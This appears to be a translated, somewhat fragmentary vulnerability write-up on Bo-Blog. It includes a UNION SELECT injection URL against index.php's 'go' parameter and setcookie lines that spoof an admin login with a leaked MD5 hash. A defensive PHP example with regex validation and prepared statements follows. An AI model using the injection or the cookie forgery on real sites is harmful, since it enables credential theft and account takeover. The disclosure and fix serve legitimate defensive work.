Author: Mind
I have read some comments from my xhming article.
Download boblog again.
The injection vulnerability has been identified by xhming.
Previously, I found an injection vulnerability similar to this vulnerability.
Unfortunately ....
View the code in the classic dialog box
index.php
if ($go) @list($job, $itemid) = @explode('_', basename($go));
The original injection statement is index.php?go=category_0) union select 1,concat(userpsw) from boblog_user%23
That is, explode splits the value on the underscore, so the table name boblog_user is cut down to just boblog.
What's more, injection vulnerabilities exist.
'category' in ({$all_needed_cates})");
It is not because of the # symbol; what follows simply becomes from boblog_user #)
PS: Probably because I won't bypass it here
The cookie spoofing vulnerability is simple
If someone skilled does inject successfully, the MD5 password does not need to be cracked.
Directly:
setcookie('userid', 1);
setcookie('userpsw', '<MD5 ciphertext>');
Yes ......
Fix: ..... Filter
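
One way to implement the filter the fix calls for, as an added example that is not Bo-Blog's own code: the go value is accepted only when it is exactly job_itemid, and the category list reaches the query through placeholders instead of string interpolation. The function names, the allow-list contents and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example, not Bo-Blog's code. Names and allow-list are hypothetical.
const ALLOWED_JOBS = ['category', 'entry', 'archive'];

/**
 * Parse a "job_itemid" value such as "category_0".
 * Returns [job, itemid] or null when the value is not exactly that shape.
 * Splitting on "_" alone only truncates the input; it does not validate it.
 */
function parse_go(string $go): ?array
{
    // Anchored: lowercase job name, one underscore, 1-9 digits, nothing else.
    if (!preg_match('/\A([a-z]+)_(\d{1,9})\z/', $go, $m)) {
        return null;
    }
    if (!in_array($m[1], ALLOWED_JOBS, true)) {
        return null;
    }
    return [$m[1], (int) $m[2]];
}

/**
 * Build a "category IN (?, ?, ...)" fragment plus integer bind values,
 * replacing the interpolated {$all_needed_cates} list.
 */
function category_in_clause(array $ids): array
{
    $ids = array_values(array_unique(array_map('intval', $ids)));
    if ($ids === []) {
        return ['1 = 0', []]; // an empty IN () is a syntax error; match nothing
    }
    $placeholders = implode(', ', array_fill(0, count($ids), '?'));
    return ["category IN ($placeholders)", $ids];
}

// Constructed sample inputs: one well-formed, two that must be rejected.
$samples = ['category_0', 'category_0) union select 1', 'unknown_5'];
foreach ($samples as $go) {
    $parsed = parse_go($go);
    if ($parsed === null) {
        echo "rejected: $go\n";
        continue;
    }
    [$job, $itemid] = $parsed;
    [$where, $binds] = category_in_clause([$itemid]);
    echo "accepted: job=$job where=\"$where\" binds=" . json_encode($binds) . "\n";
}
```

The returned fragment and bind values are meant for a prepared statement, for example PDO's prepare() followed by execute($binds). The cookie issue needs a separate change: as long as the userpsw cookie carries the stored MD5 value, a leaked hash works as a login, so authentication should rely on a random server-side session token instead.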